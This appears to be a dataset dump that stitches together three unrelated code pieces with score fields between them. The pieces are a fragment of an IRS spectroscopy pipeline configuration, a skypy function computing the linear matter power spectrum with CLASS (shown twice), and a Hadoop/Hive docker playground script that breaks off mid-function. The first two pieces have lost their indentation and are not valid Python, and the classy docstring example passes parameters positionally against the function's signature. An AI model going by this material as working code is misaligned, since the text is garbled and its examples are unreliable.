## IRS data (via CUBISM)
##-----------------------
fits_sl2 = []
fits_sl3 = []
fits_sl1 = []
fits_ll2 = []
fits_ll3 = []
fits_ll1 = []
fits_irs = []
Nch = 4 # Number of chnl (ordered as below) used
chnl = ['SL2', 'SL3', 'SL1', 'LL2', 'LL3', 'LL1']
# lab_sl = ['_04', '_06', '_08', '_09'] # M82
# lab_ll = ['_04', '_05', '_06', '_08', '_09'] # M82
lab_sl = ['']
lab_ll = ['']
for i, ch in enumerate(chnl):
## SL
if i//3==0:
for t in lab_sl:
f = path_irs+src+t+'_'+ch
if ch=='SL2':
fits_sl2.append(f)
if ch=='SL3':
fits_sl3.append(f)
if ch=='SL1':
fits_sl1.append(f)
## LL
else:
for t in lab_ll:
f = path_irs+src+t+'_'+ch
if ch=='LL2':
fits_ll2.append(f)
if ch=='LL3':
fits_ll3.append(f)
if ch=='LL1':
fits_ll1.append(f)
fits_irs.append(fits_sl2)
fits_irs.append(fits_sl3)
fits_irs.append(fits_sl1)
fits_irs.append(fits_ll2)
fits_irs.append(fits_ll3)
fits_irs.append(fits_ll1)
## Convolution
##-------------
fits_ker = []
psf = [2., 2.5, 3., 3.5, 4., 4.5, 5., 5.5, 6.]
# psf_ref = 'IRAC_5.8' # 2.11 (< LL1)
# psf_ref = 'IRAC_8.0'# 2.82 (< LL1)
psf_ref = 'Gauss_06.0'
# psf_ref = 'MIPS_24' # 6.43"
# psf_ref = 'WISE_MAP_11.6' # 6.60"
# psf_ref = 'WISE_MAP_22.1' # 11.89"
for p in psf:
fits_ker.append(path_ker+'Kernel_HiRes_Gauss_0'+
str(p)+'_to_'+psf_ref)
## Tmp files
##-----------
path_tmp = path_root+'PAHPedia/tmp/'
if not os.path.exists(path_tmp):
os.makedirs(path_tmp)
path_conv = path_tmp+'conv/' # idlib/convolve_image.pro
if not os.path.exists(path_conv):
os.makedirs(path_conv)
csv_ker = path_tmp+'kernelist' # idlib/conv_prog.pro
## Outputs
##---------
path_out = path_root+'PAHPedia/'+src+'/' # idlib/conv_prog.pro
## Calibrations
phot = 'IRAC4' # photometry filter
path_cal = path_out+'calib/'
if not os.path.exists(path_cal):
os.makedirs(path_cal)
## Tests
##-------
path_tests = path_root+'PAHPedia/tests/' | 0.144601 | 0.124107 |
import numpy as np
__all__ = [
'classy',
]
def classy(wavenumber, redshift, cosmology, **kwargs):
""" Return the CLASS computation of the linear matter power spectrum, on a
two dimensional grid of wavenumber and redshift.
Additional CLASS parameters can be passed via keyword arguments.
Parameters
----------
wavenumber : (nk,) array_like
Array of wavenumbers in units of Mpc-1 at which to
evaluate the linear matter power spectrum.
redshift : (nz,) array_like
Array of redshifts at which to evaluate the linear matter power
spectrum.
cosmology : astropy.cosmology.Cosmology
Cosmology object providing omega_matter, omega_baryon, Hubble
parameter and CMB temperature in the present day
Returns
-------
power_spectrum : (nz, nk) array_like
Array of values for the linear matter power spectrum in Mpc3
evaluated at the input wavenumbers for the given primordial power
spectrum parameters, cosmology. For nz redshifts and nk wavenumbers
the returned array will have shape (nz, nk).
Examples
--------
>>> import numpy as np
>>> from astropy.cosmology import default_cosmology
>>> cosmology = default_cosmology.get()
>>> redshift = np.array([0, 1])
>>> wavenumber = np.array([1.e-2, 1.e-1, 1e0])
>>> A_s = 2.e-9
>>> n_s = 0.965
>>> z_reio = 10.
>>> classy(wavenumber, redshift, cosmology, A_s, n_s, z_reio) # doctest: +SKIP
array([[2.34758952e+04, 8.70837957e+03],
[3.03660813e+03, 1.12836115e+03],
[2.53124880e+01, 9.40802814e+00]])
References
----------
doi : 10.1088/1475-7516/2011/07/034
arXiv: 1104.2932, 1104.2933
"""
try:
from classy import Class
except ImportError:
raise Exception("classy is required to use skypy.linear.classy")
h2 = cosmology.h * cosmology.h
params = {
'output': 'mPk',
'P_k_max_1/Mpc': np.max(wavenumber),
'z_pk': ', '.join(str(z) for z in np.atleast_1d(redshift)),
'H0': cosmology.H0.value,
'omega_b': cosmology.Ob0 * h2,
'omega_cdm': cosmology.Odm0 * h2,
'T_cmb': cosmology.Tcmb0.value,
'N_eff': cosmology.Neff,
}
params.update(kwargs)
classy_obj = Class()
classy_obj.set(params)
classy_obj.compute()
z = np.expand_dims(redshift, (-1,)*np.ndim(wavenumber))
k = np.expand_dims(wavenumber, (0,)*np.ndim(redshift))
z, k = np.broadcast_arrays(z, k)
pzk = np.empty(z.shape)
for i in np.ndindex(*pzk.shape):
pzk[i] = classy_obj.pk_lin(k[i], z[i])
if pzk.ndim == 0:
pzk = pzk.item()
return pzk | skypy/power_spectrum/_classy.py | import numpy as np
__all__ = [
'classy',
]
def classy(wavenumber, redshift, cosmology, **kwargs):
""" Return the CLASS computation of the linear matter power spectrum, on a
two dimensional grid of wavenumber and redshift.
Additional CLASS parameters can be passed via keyword arguments.
Parameters
----------
wavenumber : (nk,) array_like
Array of wavenumbers in units of Mpc-1 at which to
evaluate the linear matter power spectrum.
redshift : (nz,) array_like
Array of redshifts at which to evaluate the linear matter power
spectrum.
cosmology : astropy.cosmology.Cosmology
Cosmology object providing omega_matter, omega_baryon, Hubble
parameter and CMB temperature in the present day
Returns
-------
power_spectrum : (nz, nk) array_like
Array of values for the linear matter power spectrum in Mpc3
evaluated at the input wavenumbers for the given primordial power
spectrum parameters, cosmology. For nz redshifts and nk wavenumbers
the returned array will have shape (nz, nk).
Examples
--------
>>> import numpy as np
>>> from astropy.cosmology import default_cosmology
>>> cosmology = default_cosmology.get()
>>> redshift = np.array([0, 1])
>>> wavenumber = np.array([1.e-2, 1.e-1, 1e0])
>>> A_s = 2.e-9
>>> n_s = 0.965
>>> z_reio = 10.
>>> classy(wavenumber, redshift, cosmology, A_s, n_s, z_reio) # doctest: +SKIP
array([[2.34758952e+04, 8.70837957e+03],
[3.03660813e+03, 1.12836115e+03],
[2.53124880e+01, 9.40802814e+00]])
References
----------
doi : 10.1088/1475-7516/2011/07/034
arXiv: 1104.2932, 1104.2933
"""
try:
from classy import Class
except ImportError:
raise Exception("classy is required to use skypy.linear.classy")
h2 = cosmology.h * cosmology.h
params = {
'output': 'mPk',
'P_k_max_1/Mpc': np.max(wavenumber),
'z_pk': ', '.join(str(z) for z in np.atleast_1d(redshift)),
'H0': cosmology.H0.value,
'omega_b': cosmology.Ob0 * h2,
'omega_cdm': cosmology.Odm0 * h2,
'T_cmb': cosmology.Tcmb0.value,
'N_eff': cosmology.Neff,
}
params.update(kwargs)
classy_obj = Class()
classy_obj.set(params)
classy_obj.compute()
z = np.expand_dims(redshift, (-1,)*np.ndim(wavenumber))
k = np.expand_dims(wavenumber, (0,)*np.ndim(redshift))
z, k = np.broadcast_arrays(z, k)
pzk = np.empty(z.shape)
for i in np.ndindex(*pzk.shape):
pzk[i] = classy_obj.pk_lin(k[i], z[i])
if pzk.ndim == 0:
pzk = pzk.item()
return pzk | 0.879826 | 0.711497 |
import argparse
import collections
import distutils.dir_util
import json
import os
import re
import shlex
import shutil
import subprocess
import sys
import time

# PyPI installed modules...
import requests
# The root directory of the playground repository
ROOT_DIR = os.path.dirname(os.path.realpath(__file__))
# The hadoop distribution path on the docker nodes
HADOOP_HOME = '/himage/hadoop-3.3.0'
# The hive distribution path on the docker nodes
HIVE_HOME = '/himage/apache-hive-3.1.2-bin'
# The sqoop distribution path on the docker nodes
SQOOP_HOME = '/himage/sqoop-1.4.7.bin__hadoop-2.6.0'
# The path of the docker-compose.yml file
COMPOSE_FILE = os.path.join(ROOT_DIR, 'docker-compose.yml')
# The non-secured sql password used on the sql node
# NOTE(review): '<PASSWORD>' looks like a redacted placeholder, not a usable
# value — confirm the intended development-only password before running.
SQL_TEST_PASSWORD = '<PASSWORD>'
# The number of data nodes in the cluster (this variable only affects health checks)
NUM_DATA_NODES = 1
# The number of node manager nodes in the cluster (this variable only affects health checks)
NUM_NODE_MANAGERS = 1
# The minimum amount of disk space each node requires to operate (applicable in health checks)
MIN_DISK_SPACE = 8589934592 # 8 GiB (8 * 1024**3 bytes)
# Exposed localhost ports for each of the nodes
PORT_UI_NN1 = 3000
PORT_UI_DN1 = 3001
PORT_UI_RMAN = 3002
PORT_UI_NM1 = 3003
PORT_UI_MRHIST = 3004
PORT_UI_HS = 3005
PORT_SQL_SQL = 3006
# Descriptions of what each port does: (port, protocol, description)
PORT_DOC = [
    (PORT_UI_NN1, 'http', 'Web UI for the primary name node'),
    (PORT_UI_DN1, 'http', 'Web UI for data node 1'),
    (PORT_UI_RMAN, 'http', 'Web UI for YARN resource manager'),
    (PORT_UI_NM1, 'http', 'Web UI for node manager 1'),
    (PORT_UI_MRHIST, 'http', 'Web UI map reduce history server'),
    (PORT_UI_HS, 'http', 'Web UI for hive server'),
    (PORT_SQL_SQL, 'sql (tcp/ip)', 'SQL server connection port')
]
# A health checklist item description:
#   bean_name  - JMX bean name to look up in the /jmx metrics payload
#   prop_name  - property of that bean to read
#   check_func - callable(value) returning a NodeHealthReport
NodeHealthBeanCheck = collections.namedtuple('NodeHealthBeanCheck', \
    'bean_name prop_name check_func')
# The status of a single node in the cluster:
#   is_healthy - bool; message - human-readable details
NodeHealthReport = collections.namedtuple('NodeHealthReport', \
    'is_healthy message')
# A summary of the status on each of the nodes in the cluster
# (cluster_healthy plus one NodeHealthReport per node)
HealthReportSummary = collections.namedtuple('HealthReportSummary', \
    'cluster_healthy nn1 dn1 rman nm1 mrhist hs client sql')
class Config:
    """
    Represents the configuration for any playground tasks.

    All directory attributes are normalized to absolute paths on assignment
    (or None when unset). Instances can round-trip through JSON via
    :meth:`save` / :meth:`load`.
    """

    def __init__(self, project_name=None, source_dir=None, data_dir=None, volumes_dir=None):
        self.project_name = project_name
        self.source_dir = source_dir
        self.data_dir = data_dir
        self.volumes_dir = volumes_dir

    @staticmethod
    def _abspath_or_none(value):
        """Return the absolute form of *value*, or None when value is falsy."""
        return os.path.abspath(value) if value else None

    @property
    def project_name(self):
        """
        The project name used for the Docker-Compose project name
        """
        return self._project_name

    @project_name.setter
    def project_name(self, value):
        self._project_name = value

    @property
    def source_dir(self):
        """
        The local directory containing files to be uploaded to the client node /src directory upon
        setup.
        """
        return self._source_dir

    @source_dir.setter
    def source_dir(self, value):
        self._source_dir = self._abspath_or_none(value)

    @property
    def data_dir(self):
        """
        The local directory containing files to be ingested into HDFS upon setup.
        """
        return self._data_dir

    @data_dir.setter
    def data_dir(self, value):
        self._data_dir = self._abspath_or_none(value)

    @property
    def volumes_dir(self):
        """
        The local directory (which may not yet exist) where docker will persist files between runs.
        """
        return self._volumes_dir

    @volumes_dir.setter
    def volumes_dir(self, value):
        self._volumes_dir = self._abspath_or_none(value)

    def save(self, filename):
        """
        Saves the configuration to a file as indented JSON.
        """
        with open(filename, 'w') as _fp:
            json.dump({
                'project_name': self._project_name,
                'source_dir': self._source_dir,
                'data_dir': self._data_dir,
                'volumes_dir': self._volumes_dir
            }, _fp, indent=2)

    @staticmethod
    def load(filename):
        """
        Loads the configuration from a file previously written by :meth:`save`.
        """
        with open(filename, 'r') as _fp:
            _j = json.load(_fp)
        _c = Config()
        _c.project_name = _j['project_name']
        _c.source_dir = _j['source_dir']
        _c.data_dir = _j['data_dir']
        _c.volumes_dir = _j['volumes_dir']
        return _c
def exec_docker(config, node_name, command, workdir=None, \
    interactive=False, detached=False, check=True):
    """
    Executes a command on a node through docker.

    :param config: the active Config (provides the compose project name)
    :param node_name: the compose service name (e.g. 'nn1'); the container is
        resolved as '<project>_<node>_1'
    :param command: the command line to run; double-quoted segments are kept
        as single arguments
    :param workdir: optional working directory inside the container
    :param interactive: pass -i -t to docker exec
    :param detached: pass -d to docker exec
    :param check: raise subprocess.CalledProcessError on non-zero exit
    :returns: the docker exec return code
    """
    _args = ['docker', 'exec']
    if workdir:
        _args.append('-w')
        _args.append(workdir)
    if interactive:
        _args.append('-i')
        _args.append('-t')
    if detached:
        _args.append('-d')
    _args.append('%s_%s_1' % (config.project_name, node_name))
    # shlex.split replaces the hand-rolled quote splitter: it tokenizes on
    # whitespace while keeping quoted spans as single arguments.
    _args.extend(shlex.split(command))
    # BUGFIX: the original passed the argv *list* together with shell=True,
    # which on POSIX hands only _args[0] ('docker') to the shell and drops
    # the rest. With an argv list, shell must not be used.
    output = subprocess.run(_args, check=check)
    return output.returncode
def build_img(config):
    """
    Builds or rebuilds the dockerfile images.
    """
    set_environment(config)
    cmd = 'docker-compose -p {} -f "{}" build'.format(config.project_name, COMPOSE_FILE)
    os.system(cmd)
def format_hdfs(config):
    """
    Formats hdfs in the cluster.
    """
    format_cmd = HADOOP_HOME + '/bin/hdfs namenode -format -force clust'
    exec_docker(config, 'nn1', format_cmd)
def ingest_data(config):
    """
    Ingests data from the configured data volume into hdfs.
    """
    put_cmd = HADOOP_HOME + '/bin/hadoop fs -put /data /data'
    exec_docker(config, 'nn1', put_cmd)
def copy_source(config):
    """
    Copies from the configured local source directory to the source volume.

    Use to update the client node's /src folder on a running cluster when new code is written.
    Prints a message and returns without copying when the source directory is missing.
    """
    if not os.path.exists(config.source_dir):
        print('Source directory does not exist. Please check configuration and try again.')
        return
    dir_name = os.path.join(config.volumes_dir, 'client')
    os.makedirs(dir_name, exist_ok=True)
    # shutil.copytree replaces distutils.dir_util.copy_tree: distutils was
    # deprecated by PEP 632 and removed entirely in Python 3.12.
    # dirs_exist_ok=True (3.8+) merges into the existing volume directory.
    shutil.copytree(config.source_dir, dir_name, dirs_exist_ok=True)
    print('Source files copied to volume.')
def setup_hive(config):
    """
    Makes required hdfs directories for hive to run and initializes the schema metastore.
    """
    hadoop_fs = '%s/bin/hadoop fs ' % (HADOOP_HOME)
    # Directory creation may fail when they already exist, so don't check.
    for mkdir_args in ('-mkdir /tmp', '-mkdir -p /user/hive/warehouse'):
        exec_docker(config, 'nn1', hadoop_fs + mkdir_args, check=False)
    for chmod_args in ('-chmod g+w /tmp', '-chmod g+w /user/hive/warehouse'):
        exec_docker(config, 'nn1', hadoop_fs + chmod_args)
    schema_cmd = '%s/bin/schematool -dbType derby -initSchema' % (HIVE_HOME)
    exec_docker(config, 'hs', schema_cmd, workdir='/metastore')
def cluster_up(config):
    """
    Boots the cluster up but does not run any of the daemons.
    """
    set_environment(config)
    cmd = 'docker-compose -p {} -f "{}" up -d'.format(config.project_name, COMPOSE_FILE)
    os.system(cmd)
def start_hadoop_daemons(config):
    """
    Runs all daemons in the hadoop distribution on their respective nodes.
    """
    # (node, hadoop tool, daemon name) for each daemon in start order.
    daemons = [
        ('nn1', 'hdfs', 'namenode'),
        ('dn1', 'hdfs', 'datanode'),
        ('rman', 'yarn', 'resourcemanager'),
        ('nm1', 'yarn', 'nodemanager'),
        ('mrhist', 'mapred', 'historyserver'),
    ]
    for node, tool, daemon in daemons:
        exec_docker(config, node, '%s/bin/%s --daemon start %s' % (HADOOP_HOME, tool, daemon))
def start_hive_server(config):
    """
    Starts the hive server daemon.
    """
    server_cmd = HIVE_HOME + '/bin/hiveserver2'
    exec_docker(config, 'hs', server_cmd, detached=True, workdir='/metastore')
def cluster_down(config):
    """
    Spins the cluster down.
    """
    set_environment(config)
    cmd = 'docker-compose -p {} -f "{}" down'.format(config.project_name, COMPOSE_FILE)
    os.system(cmd)
def metric_request(port):
    """
    Sends an http request to a node's jmx endpoint. Returns the parsed json, or None on error.

    :param port: the localhost port the node's web UI is exposed on
    :returns: the decoded /jmx payload dict, or None on any connection,
        timeout, HTTP-status, or JSON-decoding failure
    """
    try:
        # Timeout so a wedged node can't hang the health check forever.
        _r = requests.get('http://localhost:%d/jmx' % (port), timeout=10)
    except requests.exceptions.RequestException:
        # Narrowed from a bare `except:`, which also swallowed
        # KeyboardInterrupt/SystemExit and programming errors.
        return None
    if _r.status_code != 200:
        return None
    try:
        return _r.json()
    except ValueError:
        return None
def find_bean_by_name(jsn, nme):
    """
    Extracts a bean of the given name from jmx metrics json object.

    Returns the first bean dict whose 'name' equals *nme*, or None when the
    payload has no 'beans' key or no bean matches.
    """
    if 'beans' not in jsn:
        return None
    for bean in jsn['beans']:
        if bean['name'] == nme:
            return bean
    return None
def extract_bean_prop(jsn, bean_name, propname):
    """
    Extracts a property of a bean of the given name from jmx metrics json object.

    Returns None when the bean is missing or lacks the property.
    """
    bean = find_bean_by_name(jsn, bean_name)
    if not bean:
        return None
    if propname not in bean:
        return None
    return bean[propname]
def gen_node_report_from_checks(jsn, checks):
    """
    Creates a node health report using the jmx metrics json and a list of type NodeHealthBeanCheck

    Each check contributes one line to the report message, prefixed with a
    check-mark or cross emoji; the report is healthy only when every check
    passes and every required bean property is present.
    """
    all_ok = True
    lines = []
    for check in checks:
        value = extract_bean_prop(jsn, check.bean_name, check.prop_name)
        if value is None:
            all_ok = False
            lines.append('\u274C Missing required bean property. Bean name: "%s", property: "%s"' % \
                (check.bean_name, check.prop_name))
            continue
        sub_report = check.check_func(value)
        if sub_report.is_healthy:
            lines.append('\u2705 ' + sub_report.message)
        else:
            all_ok = False
            lines.append('\u274C ' + sub_report.message)
    return NodeHealthReport(is_healthy=all_ok, message='\n'.join(lines))
def _check_func_disk_space(prop_val):
    """
    A check function for comparing the prop_val to the expected disk space amount.
    """
    if prop_val >= MIN_DISK_SPACE:
        return NodeHealthReport(is_healthy=True, message='Sufficient disk space.')
    return NodeHealthReport(
        is_healthy=False,
        message='Insufficient disk space. Minimum required disk space is %d. Remaining bytes: %d' % \
            (MIN_DISK_SPACE, prop_val))
def json_checker_namenode(jsn):
    """
    Checks the jmx metrics json for the namenode and returns a node health report
    """
    # Each check pairs a jmx bean/property with a predicate over its value.
    checks = [
        NodeHealthBeanCheck(
            bean_name='Hadoop:service=NameNode,name=StartupProgress',
            prop_name='PercentComplete',
            check_func=lambda i: NodeHealthReport(is_healthy=True, message='Startup completed.')
                if i == 1.0 else NodeHealthReport(is_healthy=False,
                    message='Startup not complete. Progress: %%%f.' % (i * 100))
        ),
        NodeHealthBeanCheck(
            bean_name='Hadoop:service=NameNode,name=FSNamesystem',
            prop_name='tag.HAState',
            check_func=lambda i: NodeHealthReport(is_healthy=True, message='Namenode active.')
                if i == 'active' else NodeHealthReport(is_healthy=False,
                    message='Namenode inactive. State: "%s"' % (i))
        ),
        NodeHealthBeanCheck(
            bean_name='Hadoop:service=NameNode,name=FSNamesystem',
            prop_name='MissingBlocks',
            check_func=lambda i: NodeHealthReport(is_healthy=True, message='No missing blocks.')
                if i == 0 else NodeHealthReport(is_healthy=False,
                    message='One or more missing blocks. Data is missing. Blocks missing: %d.' % (i))
        ),
        NodeHealthBeanCheck(
            bean_name='Hadoop:service=NameNode,name=FSNamesystem',
            prop_name='CapacityRemaining',
            check_func=_check_func_disk_space
        ),
        NodeHealthBeanCheck(
            bean_name='Hadoop:service=NameNode,name=FSNamesystemState',
            prop_name='NumLiveDataNodes',
            check_func=lambda i: NodeHealthReport(is_healthy=True,
                    message='All data nodes are connected.')
                if i == 1 else NodeHealthReport(is_healthy=False,
                    message='Some data nodes are not connected. Number of connected data'
                    ' nodes: %d/%d' % (i, NUM_DATA_NODES))
        ),
        NodeHealthBeanCheck(
            bean_name='Hadoop:service=NameNode,name=FSNamesystemState',
            prop_name='NumStaleDataNodes',
            check_func=lambda i: NodeHealthReport(is_healthy=True, message='No stale data nodes.')
                if i == 0 else NodeHealthReport(is_healthy=False,
                    message='Some data nodes have not sent a heartbeat in some time.'
                    ' Number of stale data nodes: %d' % (i))
        )
    ]
    return gen_node_report_from_checks(jsn, checks)
def json_checker_datanode(jsn):
    """
    Checks the jmx metrics json for the datanode and returns a node health report
    """
    checks = [
        NodeHealthBeanCheck(
            bean_name='Hadoop:service=DataNode,name=FSDatasetState',
            prop_name='Remaining',
            check_func=_check_func_disk_space
        ),
        NodeHealthBeanCheck(
            bean_name='Hadoop:service=DataNode,name=FSDatasetState',
            prop_name='NumFailedVolumes',
            check_func=lambda i: NodeHealthReport(is_healthy=True, message='No failed volumes.')
                if i == 0 else NodeHealthReport(is_healthy=False,
                    message='One or more volumes have failed. Number of failed volumes: %d' % (i))
        )
    ]
    return gen_node_report_from_checks(jsn, checks)
def json_checker_resourcemanager(jsn):
    """
    Checks the jmx metrics json for the resource manager node and returns a node health report
    """
    checks = [
        NodeHealthBeanCheck(
            bean_name='Hadoop:service=ResourceManager,name=ClusterMetrics',
            prop_name='NumActiveNMs',
            check_func=lambda i: NodeHealthReport(is_healthy=True,
                    message='All node managers connected.')
                if i == 1 else NodeHealthReport(is_healthy=False,
                    message='One or more node managers not connected. Number of connected'
                    ' node managers: %d/%d' % (i, NUM_NODE_MANAGERS))
        ),
        NodeHealthBeanCheck(
            bean_name='Hadoop:service=ResourceManager,name=ClusterMetrics',
            prop_name='NumUnhealthyNMs',
            check_func=lambda i: NodeHealthReport(is_healthy=True,
                    message='All node managers are healthy.')
                if i == 0 else NodeHealthReport(is_healthy=False,
                    message='One or more node managers are unhealthy. Number of unhealthy'
                    ' node managers: %d' % (i))
        )
    ]
    return gen_node_report_from_checks(jsn, checks)
def json_checker_response_only(jsn):
    """
    Checks the jmx metrics json on any node that has jmx metrics but no other specific health checks
    """
    # Any non-empty 'beans' list counts as a healthy response.
    has_beans = 'beans' in jsn and len(jsn['beans']) > 0
    if has_beans:
        message = '\u2705 Response has expected json.'
    else:
        message = '\u274C Response does not have expected json.'
    return NodeHealthReport(is_healthy=has_beans, message=message)
def gen_node_health_report(jsn, json_checker_func):
    """
    Generates a node health report using the json checker function
    """
    if not jsn:
        # No metrics came back at all, so the node is presumed down.
        return NodeHealthReport(is_healthy=False,
            message='\u274C Could not fetch metrics from server. Most likely the node is down.')
    return json_checker_func(jsn)
def gen_docker_health_report(config, node_name):
    """
    Generates a health report simply based on if the given node is running or not.
    """
    # A trivial command only succeeds when the container is actually up.
    _rc = exec_docker(config, node_name, 'bash -c exit 0', check=False)
    running = _rc == 0
    msg = '\u2705 Node running' if running else '\u274C Node not running'
    return NodeHealthReport(is_healthy=running, message=msg)
def gen_health_summary(config):
    """
    Generates a health report summary on the running cluster.
    """
    # Per-node reports, keyed by their HealthReportSummary field names.
    reports = {
        'nn1': gen_node_health_report(metric_request(PORT_UI_NN1), json_checker_namenode),
        'dn1': gen_node_health_report(metric_request(PORT_UI_DN1), json_checker_datanode),
        'rman': gen_node_health_report(metric_request(PORT_UI_RMAN), json_checker_resourcemanager),
        'nm1': gen_node_health_report(metric_request(PORT_UI_NM1), json_checker_response_only),
        'mrhist': gen_node_health_report(metric_request(PORT_UI_MRHIST), json_checker_response_only),
        'hs': gen_node_health_report(metric_request(PORT_UI_HS), json_checker_response_only),
        'client': gen_docker_health_report(config, 'client'),
        'sql': gen_docker_health_report(config, 'sql')
    }
    # The whole cluster is healthy only when every node report is healthy.
    overall = all(r.is_healthy for r in reports.values())
    return HealthReportSummary(cluster_healthy=overall, **reports)
def print_node_health(report):
    """
    Prints a node health report
    """
    if report is None:
        print('? Report not implemented.')
        print()
        return
    status = '\u2705 Healthy' if report.is_healthy else '\u274C Unhealthy'
    print('Overall Status:')
    print(status)
    print('Checklist:')
    print(report.message)
    print()
def print_summary(summary):
    """
    Prints a summary health report
    """
    sections = [
        ('NAME NODE 1', summary.nn1),
        ('DATA NODE 1', summary.dn1),
        ('RESOURCE MANAGER', summary.rman),
        ('NODE MANAGER 1', summary.nm1),
        ('MAP REDUCE HISTORY SERVER', summary.mrhist),
        ('HIVE SERVER', summary.hs),
        ('CLIENT NODE', summary.client),
        ('SQL SERVER', summary.sql)
    ]
    for title, report in sections:
        print(title)
        print_node_health(report)
    print('OVERALL CLUSTER HEALTH')
    print('\u2705 Healthy' if summary.cluster_healthy else '\u274C Unhealthy')
def print_health(config):
    """
    Prints the health of the cluster
    """
    print('Checking cluster health.')
    print()
    print_summary(gen_health_summary(config))
def wait_for_healthy_nodes_print(config, timeout):
    """
    Blocks until all nodes are healthy or until timeout, and prints the results.
    """
    started_at = time.time()
    summary = wait_for_healthy_nodes(config, timeout=timeout)
    elapsed = time.time() - started_at
    print('Wait completed in %fs. Summary:' % (elapsed))
    print()
    print_summary(summary)
def get_summary_preview_str(summary):
    """
    Gets a oneliner string displaying the summarized cluster health
    """
    nodes = [
        ('nn1', summary.nn1), ('dn1', summary.dn1), ('rman', summary.rman),
        ('nm1', summary.nm1), ('mrhist', summary.mrhist), ('hs', summary.hs),
        ('client', summary.client), ('sql', summary.sql)
    ]
    parts = []
    for label, report in nodes:
        mark = '\u2705' if report.is_healthy else '\u274C'
        parts.append('%s %s' % (mark, label))
    return ', '.join(parts)
def wait_for_healthy_nodes(config, timeout=200, interval=5):
    """
    Blocks until all nodes are healthy or until timeout.

    Polls the cluster every `interval` seconds for roughly `timeout` seconds.
    Returns the last generated HealthReportSummary, which may be unhealthy if
    the timeout was reached.
    """
    _summary = None
    # Bug fix: max(1, ...) guarantees at least one poll even when
    # timeout < interval. Previously range(0) skipped the loop entirely and
    # the function returned None, crashing callers that read
    # summary.cluster_healthy.
    for _t in range(max(1, int(timeout / interval))):
        _summary = gen_health_summary(config)
        if _summary.cluster_healthy:
            return _summary
        print('...Waiting... ' + get_summary_preview_str(_summary))
        time.sleep(interval)
    return _summary
def setup(config):
    """
    One-time setup for the cluster.
    """
    # Each step is announced before it runs; all take the config object.
    steps = [
        ('Destroying volumes.', destroy_volumes),
        ('Spinning cluster up.', cluster_up),
        ('Formatting HDFS.', format_hdfs),
        ('Starting Hadoop Daemons.', start_hadoop_daemons),
        ('Setting up Hive server.', setup_hive),
        ('Ingesting configured data volume into HDFS (this could take some time).', ingest_data),
        ('Copying configured source folder to the client node volume.', copy_source),
        ('Spinning cluster down.', cluster_down)
    ]
    for message, action in steps:
        print(message)
        action(config)
def print_port_doc():
    """
    Prints documentation on the exposed ports.
    """
    print('Exposed ports on localhost:')
    for port, port_type, description in PORT_DOC:
        print('Port: %s, Type: %s, Description: %s' % (port, port_type, description))
def start(config, wait=True):
    """
    Boots up the cluster and starts all of the daemons on the cluster.
    """
    boot_steps = [
        ('Spinning cluster up.', cluster_up),
        ('Starting Hadoop Daemons.', start_hadoop_daemons),
        ('Starting Hive Server.', start_hive_server)
    ]
    for message, action in boot_steps:
        print(message)
        action(config)
    if wait:
        print('Starting wait routine.')
        wait_for_healthy_nodes_print(config, 200)
    print_port_doc()
def stop(config):
    """
    Spins down the cluster.
    """
    # Thin wrapper that announces the action before delegating.
    print('Spinning cluster down.')
    cluster_down(config)
def destroy_volumes(config):
    """
    Removes the persistant file storage of the cluster.
    """
    print('Spinning cluster down.')
    cluster_down(config)
    if os.path.exists(config.volumes_dir):
        print('Deleting files.')
        shutil.rmtree(config.volumes_dir)
    else:
        print('Volumes directory does not exist. Cannot delete.')
def print_hadoop_node_logs(config, node_name):
    """
    Prints the logs of the given hadoop node.
    """
    # Bug fix: the '%s' placeholder was never substituted, so docker received
    # the literal path '%s/logs/*.log'. Interpolate HADOOP_HOME as intended.
    exec_docker(config, node_name, 'cat %s/logs/*.log' % (HADOOP_HOME))
def beeline_cli(config):
    """
    Launches an interactive cli on the client node with beeline cli.
    """
    command = '%s/bin/beeline -u jdbc:hive2://hs:10000' % (HIVE_HOME)
    exec_docker(config, 'client', command, workdir='/src', interactive=True)
def bash_cli(config, nodename):
    """
    Launches an interactive bash shell on the given node.
    """
    shell = 'bash'
    exec_docker(config, nodename, shell, interactive=True)
def sqlcmd_cli(config, local):
    """
    Launches an interactive sql cli on the client node or local host if specified.
    """
    if not local:
        exec_docker(config, 'client', '/opt/mssql-tools/bin/sqlcmd -S sql -U sa -P %s' % \
            (SQL_TEST_PASSWORD), workdir='/src', interactive=True)
    else:
        # Requires sqlcmd on the host's PATH.
        os.system('sqlcmd -S tcp:localhost,%d -U sa -P %s' % (PORT_SQL_SQL, SQL_TEST_PASSWORD))
def sql_exec_query(config, query, database_name='master'):
    """
    Executes an sql query from the client node.
    """
    command = '/opt/mssql-tools/bin/sqlcmd -S sql -U sa -d %s -P %s -q "%s"' % \
        (database_name, SQL_TEST_PASSWORD, query)
    exec_docker(config, 'client', command, workdir='/src')
def sql_exec_file(config, filename):
    """
    Executes an sql file from the source directory on the client node.
    """
    command = '/opt/mssql-tools/bin/sqlcmd -S sql -U sa -P %s -i "%s"' % \
        (SQL_TEST_PASSWORD, filename)
    exec_docker(config, 'client', command, workdir='/src')
def sqoop_export(config, export_dir, sql_table, database_name='master', delimiter=','):
    """
    Exports HDFS text delimited files to the sql node.
    """
    command = ('%s/bin/sqoop export --connect "jdbc:sqlserver://sql;databaseName=%s"'
        ' --username "sa" --password "%s" --export-dir "%s" --table "%s"'
        ' --input-fields-terminated-by "%s"') % \
        (SQOOP_HOME, database_name, SQL_TEST_PASSWORD, export_dir, sql_table, delimiter)
    exec_docker(config, 'client', command, workdir='/src')
def launch_ssms_win_local(executable_path):
    """
    Launches Sql Server Management Studio locally.
    """
    # Guard clauses: Windows only, and the executable must exist.
    if os.name != 'nt':
        print('This command is not implemented for non-Windows platforms.')
        return
    if not os.path.exists(executable_path):
        print('The executable path for ssms does not exist. Please provide the correct one with' \
            ' arg "-f".' \
            )
        return
    print('Note: Connection will only succeed if "Remember Password" has been checked in ' \
        'the SSMS login previously.')
    print('Use test password: %s' % (SQL_TEST_PASSWORD))
    os.system('"%s" -S tcp:localhost,%d -U sa' % (executable_path, PORT_SQL_SQL))
def exec_hive_file(config, src_file):
    """
    Executes a hive script file from the source directory on the client node.
    """
    command = '%s/bin/beeline -u jdbc:hive2://hs:10000 -f %s' % (HIVE_HOME, src_file)
    exec_docker(config, 'client', command, workdir='/src')
def exec_hive_query(config, query):
    """
    Executes a hive query from the client node.
    """
    command = '%s/bin/beeline -u jdbc:hive2://hs:10000 -e "%s"' % (HIVE_HOME, query)
    exec_docker(config, 'client', command, workdir='/src')
def input_with_validator(prompt, failure_msg, validator_func):
    """
